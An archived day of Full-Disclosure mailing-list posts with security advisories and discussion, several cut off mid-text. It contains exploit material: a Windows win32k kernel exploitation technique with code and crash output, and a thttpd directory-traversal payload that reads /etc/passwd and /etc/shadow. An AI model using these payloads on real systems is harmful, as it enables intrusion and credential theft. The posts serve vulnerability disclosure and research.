[Full-disclosure] Sony PS3 Firmware v4.31 - Code Execution Vulnerability

2013-05-20 Thread Vulnerability Lab 
Title:
==
Sony PS3 Firmware v4.31 - Code Execution Vulnerability


Date:
=
2013-05-12


References:
===
http://www.vulnerability-lab.com/get_content.php?id=767


VL-ID:
=
767


Common Vulnerability Scoring System:

6.5


Introduction:
=
The PlayStation 3 is the third home video game console produced by Sony 
Computer Entertainment and the successor to the 
PlayStation 2 as part of the PlayStation series. The PlayStation 3 competes 
with Microsoft`s Xbox 360 and Nintendo`s Wii 
as part of the seventh generation of video game consoles. It was first released 
on November 11, 2006, in Japan, with 
international markets following shortly thereafter.

Major features of the console include its unified online gaming service, the 
PlayStation Network, its multimedia capabilities, 
connectivity with the PlayStation Portable, and its use of the Blu-ray Disc as 
its primary storage medium.

(Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_3 )


PlayStation Network, often abbreviated as PSN, is an online multiplayer gaming 
and digital media delivery service provided/run 
by Sony Computer Entertainment for use with the PlayStation 3, PlayStation 
Portable, and PlayStation Vita video game consoles. 
The PlayStation Network is the video game portion of the Sony Entertainment 
Network.

(Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_Network)


Abstract:
=
The Vulnerability Laboratory Research Team discovered a code execution 
vulnerability in the official Playstation3 v4.31 Firmware.


Report-Timeline:

2012-10-26: Researcher Notification & Coordination
2012-11-18: Vendor Notification 1
2012-12-14: Vendor Notification 2
2012-01-18: Vendor Notification 3
2012-**-**: Vendor Response/Feedback
2012-05-01: Vendor Fix/Patch by Check
2012-05-13: Public Disclosure


Status:

Published


Affected Products:
==
Sony
Product: Playstation 3 4.31


Exploitation-Technique:
===
Local


Severity:
=
High


Details:

A local code execution vulnerability is detected in the official Playstation3 
v4.31 Firmware. 
The vulnerability allows local attackers to inject and execute code out of 
vulnerable ps3 menu main web context. 

There are 3 types of save games for the sony ps3. The report is only bound to 
the .sfo save games of the Playstation3.
The ps3 save games sometimes use a PARAM.SFO file in the folder (USB or PS3 HD) 
to display movable text like marquees, 
in combination with a video, sound and the (path) background picture. Normally 
the ps3 firmware parse the redisplayed 
save game values & detail information text when processing to load it via 
usb/ps3-hd. The import ps3 preview filtering 
can be bypassed via a splitted char by char injection of script code or system 
(ps3 firmware) specific commands.

The attacker syncronize his computer (to change the usb context) with USB (Save 
Game) and connects to the network 
(USB, COMPUTER, PS3), updates the save game via computer and can execute the 
context directly out of the ps3 savegame preview 
listing menu (SUB/HD). The exploitation requires local system access, a 
manipulated .sfo file, an usb device. The attacker 
can only use the given byte size of the saved string (attribute values) to 
inject his own commands or script code.

The ps3 filter system of the SpeicherDaten (DienstProgramm) module does not 
recognize special chars and does not provide 
any kind of input restrictions. Attackers can manipulate the .sfo file of a 
save game to execute system specific commands 
or inject malicious persistent script code.

Successful exploitation of the vulnerability can result in persistent but local 
system command executions, psn session 
hijacking, persistent phishing attacks, external redirect out of the vulnerable 
module, stable persistent save game preview 
listing context manipulation.


Vulnerable Section(s):
[+] PS Menu > Game (Spiel)

Vulnerable Module(s):
[+] SpeicherDaten (DienstProgramm) PS3 > USB 
Gerät

Affected Section(s):
[+] Title - Save Game Preview Resource (Detail 
Listing)


Proof of Concept:
=
The firmware preview listing validation vulnerability can be exploited by local 
attackers and with low or medium required user interaction.
For demonstration or reproduce ...

The attacker needs to sync his computer (to change the usb context) with USB 
(Save Game) and connects to the network
(USB, COMPUTER, +PS3), updates the save game via computer and can execute the 
context directly out of the ps3 savegame preview 
listing menu (SUB/HD). The exploitation requires local system access, a 
manipulated .sfo file, an usb device. The attacker 
can only use the given byte size of the saved string (attribute values) to 
inject his own commands or script code.

T

[Full-disclosure] Trend Micro DirectPass 1.5.0.1060 (Cloud) Software - Multiple Software Vulnerabilities

2013-05-20 Thread Vulnerability Lab 
Title:
==
Trend Micro DirectPass 1.5.0.1060 (Cloud) Software - Multiple Software 
Vulnerabilities


Date:
=
2013-05-21


References:
===
http://www.vulnerability-lab.com/get_content.php?id=894

Article: http://www.vulnerability-lab.com/dev/?p=580

Trend Micro (Reference): 
http://esupport.trendmicro.com/solution/en-US/1096805.aspx
Trend Micro Solution ID: 1096805

Video: http://www.vulnerability-lab.com/get_content.php?id=951


VL-ID:
=
894


Common Vulnerability Scoring System:

6.1


Introduction:
=
Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure 
location, so you only need to 
remember one password. Other features include: Keystroke encryption, secure 
password generation, automatic 
form-filling, confidential notes, and a secure browser.

Convenience - You can securely and easily manage passwords for numerous online 
accounts with just one 
password and automatically login to your websites with one click. More Security 
- You get an extra layer of 
online security with a specially designed browser for online banking and 
financial websites and protection 
from keylogging malware. No Hassles – You don’t have to be technical wizard to 
benefit from this password 
service, it’s simple to use. Confidence – You can have peace-of-mind using a 
password service provided by 
an Internet security provider with 20+ years of experience. All Your Devices – 
You can use DirectPass 
password manager on Windows PCs, Android mobile, Android Tablet, iPads and 
iPhones, and all devices are 
automatically encrypted and synchronized using the cloud

(Copy of the Vendor Homepage: 
http://www.trendmicro.com/us/home/products/directpass/index.html )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple software 
vulnerabilities in the official Trend Micro DirectPass v1.5.0.1060 Software.


Report-Timeline:

2013-03-08: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-03-09: Vendor Notification (Trend Micro - Security Team)
2013-03-16: Vendor Response/Feedback (Trend Micro - Karen M.)
2013-05-09: Vendor Fix/Patch (Trend Micro - Active Update Server)
2013-05-15: Vendor Fix/Patch (Trend Micro - Solution ID & Announcement)
2013-05-21: Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Trend Micro
Product: DirectPass 1.5.0.1060


Exploitation-Technique:
===
Local


Severity:
=
High


Details:

1.1
A local command injection vulnerability is detected in the official Trend Micro 
DirectPass v1.5.0.1060 Software.
The vulnerability allows local low privileged system user accounts to inject 
system specific commands or local 
path requests to compromise the software.

The vulnerability is located in the direct-pass master password setup module of 
the Trend Micro InstallWorkspace.exe file.
The master password module of the software allows users to review the included 
password in the secound step for security 
reason. The hidden protected master password will only be visible in the check 
module when the customer is processing to 
mouse-over onto the censored password field. When the software is processing to 
display the hidden password in plain the 
command/path injection will be executed out of the not parsed master password 
context in in the field listing.

Exploitation of the vulnerability requires a low privilege system user account 
with direct-pass access and low or medium 
user interaction. Successful exploitation of the vulnerability results in 
software and system process compromise or 
execution of local system specific commands/path.

Vulnerable File(s):
[+] InstallWorkspace.exe

Vulnerable Module(s):
[+] Setup Master Password

Vulnerable Parameter(s):
[+] Master Password

Affected Module(s):
[+] Check Listing (Master Password)


1.2
A persistent input validation vulnerability is detected in the official Trend 
Micro DirectPass v1.5.0.1060 Software.
The bug allows local attackers with low privileged system user account to 
implement/inject malicious script code on 
application side (persistent) of the software.

The persistent web vulnerability is located in the direct-pass check module 
when processing to list a manipulated master password. 
In step one injects a malicious iframe in the hidden fields as master password. 
The inserted context will be saved and the execution 
will be in the next step when processing to list the master password context in 
the last check module. To bypass the validation the 
and execute the injected script code the attacker needs to split (%20) the 
input request.

Exploitation of the vulnerability requires medium user interaction and a low 
privilege system user account with direct-pa

Re: [Full-disclosure] exploitation ideas under memory pressure

2013-05-20 Thread Tavis Ormandy 
On Fri, May 17, 2013 at 05:44:58PM -0700, Tavis Ormandy wrote:
> On Fri, May 17, 2013 at 02:26:10PM -0700, Tavis Ormandy wrote:
> > 
> > The question is how to get PATHALLOC() to succeed under memory pressure so 
> > we
> > can make this exploitable, my first thought was have another thread
> > manipulating the free pool, but I can't figure out how to synchronize
> > that. Getting code execution should be trivial after this.
> > 
> > I guess it's possible to just race it until we win, but this seems like an
> > inelegant solution. Anyone have any ideas?
> > 
> 
> Ahh, I just realised a really cute trick, we can make PATHREC->next
> point to the same userspace PATHREC, and EPATHOBJ::bFlatten will spin
> forever traversing an infinite linked list.
> 
> i.e.
> 
> PathRecord->next = PathRecord;
> 
> While it's spinning, another thread can clean up the pool, then patch
> the listnode (because it's in userspace), to break into pprFlattenRec!
> Turning this into a clean write-what-where should be trivial.
> 
> Anyone want to volunteer to write it up over the weekend? :)
> 
> Tavis.

I guess I'm talking to myself, maybe this list is all about XSS now ;)

I'm quite proud of this list cycle trick, here's how to turn it into an
arbitrary write.

First, we create a watchdog thread that will patch the list atomically
when we're ready. This is needed because we can't exploit the bug while
HeavyAllocPool is failing, because of the early exit in pprFlattenRec:

.text:BFA122B8 call newpathrec  ; 
EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong)
.text:BFA122BD cmp eax, 1   ; Check for failure
.text:BFA122C0 jz  short continue
.text:BFA122C2 xor eax, eax ; Exit early
.text:BFA122C4 jmp early_exit

So we create a list node like this:

PathRecord->Next= PathRecord;
PathRecord->Flags   = 0;

Then EPATHOBJ::bFlatten() spins forever doing nothing:

BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this)
{
/* ... */

for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext )
{
  if ( ppr->flags & PD_BEZIER )
  {
ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr);
  }
}

/* ... */
}

While it's spinning, we clean up in another thread, then patch the thread (we
can do this, because it's now in userspace) to trigger the exploit. The first
block of pprFlattenRec does something like this:

if ( pprNew->pprPrev )
  pprNew->pprPrev->pprnext = pprNew;

Let's make that write to 0x.

DWORD WINAPI WatchdogThread(LPVOID Parameter)
{

// This routine waits for a mutex object to timeout, then patches the
// compromised linked list to point to an exploit. We need to do this.
LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex@%p",
   GetCurrentThreadId(),
   Mutex);

if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
// It looks like the main thread is stuck in a call to FlattenPath(),
// because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
// up, and then patch the list to trigger our exploit.
while (NumRegion--)
DeleteObject(Regions[NumRegion]);

LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &PathRecord->next, 
&ExploitRecord);

InterlockedExchangePointer(&PathRecord->next, &ExploitRecord);

} else {
LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
}

return 0;
}

PathRecord->next= PathRecord;
PathRecord->prev= (PVOID)(0x42424242);
PathRecord->flags   = 0;

ExploitRecord.next  = NULL;
ExploitRecord.prev  = 0x;
ExploitRecord.flags = PD_BEZIERS;

Here's the output on Windows 8:

kd> g
***
* *
*Bugcheck Analysis*
* *
***

Use !analyze -v to get detailed debugging information.

BugCheck 50, {, 1, 8f18972e, 2}

*** WARNING: Unable to verify checksum for ComplexPath.exe
*** ERROR: Module load completed but symbols could not be loaded for 
ComplexPath.exe
Probably caused by : win32k.sys ( win32k!EPATHOBJ::pprFlattenRec+82 )

Followup: MachineOwner
-

nt!RtlpBreakWithStatusInstruction:
810f46f4 cc  int 3
kd> kv
ChildEBP RetAddr  Args to Child  
a03ab494 8111c87d 0003 c17b60e1  nt!RtlpBreakWithStatusInstruction 
(FPO: [1,0,0])
a03ab4e4 8111c119 0003 817d5340 a03ab8e4 nt!KiBugCheckDebugBreak+0x1c (FPO: 
[Non-Fpo])
a03ab8b8 810f30ba 0050  0001 nt!KeBugCheck2+0x655 (FPO: 
[6,239,4])
a03ab8dc 810f2ff1 0050 c

Re: [Full-disclosure] My ISP is routing traffic to private addresses...

2013-05-20 Thread Patrick Webster 
Maybe when we cut over to IPv6 the ISPs will revert to the golden age of
putting all their gear on publicly addressable space :)

Conversely, an enjoyable network design is where you route public IPs from
a private network to a private network, and the public IP has different
services on the internet to the internally routed version, but clients need
access to both.

NATing heaven.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Critical issues affecting multiple game engines

2013-05-20 Thread ReVuln 

We have just released a paper [1], in which we detail several 0-day
issues affecting a number of different game engines, including: Unreal
Engine, CryEngine 3 and idTech 4.

During our presentation at the recent NoSuchCon conference in Paris, we
discussed [2] additional details about game engine issues. Additionally
we demonstrated [3] how an attacker can use master servers to perform
mass-exploiting of game vulnerabilities, in order to target and potentially
take down entire game networks.


[1] http://revuln.com/files/ReVuln_Game_Engines_0days_tale.pdf
[2] http://revuln.com/files/Ferrante_Auriemma_Exploiting_Game_Engines.pdf
[3] http://vimeo.com/66027238


---
ReVuln
http://revuln.com
http://twitter.com/revuln
http://revuln.com/revuln.asc




signature.asc
Description: Message signed with OpenPGP using GPGMail
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] My ISP is routing traffic to private addresses...

2013-05-20 Thread Alexander Georgiev 

Because private addresses have no global meaning, routing information
  about private networks shall not be propagated on inter-enterprise
  links, and packets with private source or destination addresses
  should not be forwarded across such links. Routers in networks not
  using private address space, especially those of Internet service
  providers, are expected to be configured to reject (filter out)
  routing information about private networks. If such a router receives
  such information the rejection shall not be treated as a routing
  protocol error.



Am 18. Mai 2013 14:55:08 schrieb Justin Elze :

The idea behind private IP space is it doesn't leave the ISPs AS via BGP to
the rest of the internet.

On the topic of routing if you're router doesn't have a directly connected
route or specific route for 172.x.x.x/whatever it will automatically send
information to the default 0.0.0.0 route.

There could be a number of cases where you had private IP space in front of
a router/wap/whatever.

ISPs use prefix lists on their boarder BGP routers to explicitly allow
which ranges get redistributed to the rest of the internet.


On Sat, May 18, 2013 at 7:41 AM, Kirils Solovjovs <
kirils.solovj...@kirils.com> wrote:

>
>
> On 2013.05.18. 10:34, Alexander Georgiev wrote:
>
>> It is sad, that many people don't understand network basics. BTW, your
>> internet router should not forward rfc1918 addresses to the outside,
>> shouldn't he?
>>
> It should. Private address ranges are not marked "magic cows" inside a
> classical router's firmware.
>
> Still the problem OP is experiencing is strange, since if there is a local
> subnet, it should have a priority local route. Why isn't it there?
>
> Btw, I'd be cautious to state that ISP filter incoming packets with
> dst=private. The limitation here would be that private ranges will usually
> be router upstream, so you can't really get past and internet exchange.
>
> --
> Kirils Solovjovs
>
>
> __**_
> Full-Disclosure - We believe in it.
> Charter: 
http://lists.grok.org.uk/full-**disclosure-charter.html

> Hosted and sponsored by Secunia - http://secunia.com/
>



--
IMPORTANT NOTICE: This e-mail and any attachments thereto is intended only
for use by the individual or entity to whom it's addressed and may be
proprietary and/or legally privileged. If you are not the intended
recipient of this e-mail, you are hereby notified that any dissemination,
distribution or copying of this email, and any attachments thereto, without
the prior written permission of the sender is strictly prohibited.   If you
receive this e-mail in error, please immediately telephone or e-mail the
sender and permanently delete the original copy and any copy of this
e-mail, and any printout thereof.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Defense in depth -- the Microsoft way

2013-05-20 Thread Stefan Kanthak 
Hi @ll,

the "Microsoft Installer" creates for applications installed via an
.MSI the following uninstall information in the Windows registry
(see ):

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall]
"UninstallString"="MsiExec.Exe /X{}"
"ModifyPath"="MsiExec.Exe /I{}"

Note the unqualified path to the executable "msiexec.exe".

On Windows installations without the "SafeProcessSearchMode" hotfix
(cf. ) or with this safeguard
turned off (cf. ,
which refers to  alias MS09-015),
an executable "msiexec.exe" placed in the CWD or the users "base"
directory (addressed by "%HOMEDRIVE%%HOMEPATH%" and typically equal to
"%USERPROFILE%") can be run instead of the intended executable
"%SystemRoot%\System32\MsiExec.Exe".


The VERY simple fix (which eliminates this attack vector completely):
always use fully-qualified paths to the well-known executables.

JFTR: cf. 

Stefan Kanthak

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Thttpd 2.25b Directory Traversal Vulnerability

2013-05-20 Thread metropolis haxor 
Hi guys,
You can find the software affected at 
http://www.acme.com/software/thttpd/thttpd-2.25b.tar.gz 
Thanks,
Metropolis
###
#
# Software Name : Thttpd 2.25b
#
# Version :  2.25b (29dec2003)
#
# Bug Type : Directory Traversal Vulnerability
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 19/05/2013
#
# Download app : http://www.acme.com/software/thttpd/thttpd-2.25b.tar.gz
#
#
###
 
PoC :
 
127.0.0.1:80/../../../../../../../../etc/passwd


127.0.0.1:80/../../../../../../../../etc/shadow 
 

Example :
 
metropolis@Linuxbox ~ $ GET 127.0.0.1:80/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/bin/false
gdm:x:42:42::/var/gdm:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
named:x:70:70:Named:/var/named:/bin/false
pcap:x:77:77::/var/arpwatch:/bin/nologin
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
junkbust:x:73:73::/etc/junkbuster:/bin/bash
mailman:x:41:41:GNU Mailing List Manager:/var/mailman:/bin/false
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
pvm:x:24:24::/usr/share/pvm3:/bin/bash
user:$1$DjTSjByw$IQj8EmL4l7b0tLWbUTOrX0:0:0:Linux User,,,:/home/user:/bin/sh

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/